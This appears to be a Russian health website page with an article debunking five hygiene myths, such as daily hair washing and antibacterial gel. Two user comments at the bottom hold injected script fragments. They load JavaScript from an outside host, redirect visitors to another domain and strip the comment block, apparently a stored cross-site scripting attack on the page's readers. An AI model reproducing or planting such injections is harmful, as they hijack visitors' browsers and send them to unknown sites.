Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мифы о личной гигиене. Ну...  >>  Мифы о личной гигиене. Нужно ли так часто мыться?
 
Обратная связь
 

Мифы о личной гигиене. Нужно ли так часто мыться?

Размер шрифта
12 марта 2014 00:00
  • google_analytics: false
  • Нравится

Такие привычки как мытье рук и чистка зубов прочно вошли в нашу жизнь, и мы редко задумываемся над тем, насколько они нам нужны. Наша статья поможет вам расставить все точки над «em».

Мифы о личной гигиене. Нужно ли так часто мыться?

Миф №1: по возможности избегать общественных туалетов

На самом деле, общественные туалеты совсем не такие опасные, какими их принято считать. Конечно, в унитазах живут различные бактерии, но заражение происходит чрезвычайно редко. В частности, неповрежденная кожа является основным барьером на пути болезнетворных микроорганизмов.

Миф №2: мыть голову каждый день

Душ действительно желательно принимать каждый день, а вот мыть голову каждый день совсем не обязательно. Периодичность, с которой вам нужно мыть голову зависит от нескольких факторов, в частности от типа волос, состояния кожи головы, длины волос и так далее. Частое использование шампуня вредит волосам, поскольку лишает их естественной защиты в виде кожного сала.

Миф №3: стоматолог не сможет определить, пользуетесь ли вы зубной нитью или нет

Стоматолога трудно обмануть. Даже если перед визитом к стоматологу вы воспользуетесь зубной нитью, он все равно узнает правду – вас выдаст кровоточивость десен. Налет, который образуется на зубах, приводит к появлению кариеса и заболеваниям десен.

Миф №4: чем чаще расчесывать волосы, тем лучше

Конечно, волосы нужно расчесывать, но не стоит делать это слишком часто. Частое расчесывание приводит к ослаблению волос, делает их более ломкими и ухудшает внешний вид.

Миф №5: антибактериальный гель – универсальное средство защиты

Несмотря на то, что антибактериальный гель содержит 60% спирта, нет ничего лучше обычного мыла и воды. В настоящее время существует мнение, что чрезмерное использование антибактериального геля может привести к развитию резистентности микроорганизмов. Если вы заботитесь о чистоте рук, лучше помыть их обычным, а не антибактериальным мылом.

Все о том, как бороться с микробами вокруг нас в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Собрались в отпуск? В этих странах вы обязательно заболеете!   ПРОфессиональный и эффективный уход за полостью рта   Как тебе не заболеть   Мой до дыр! Неделя мытья рук  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Можно ли вылечить грибок без врача?
Как действительно избавиться от всех микробов. Часть 1
Ваши весы вам врут

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.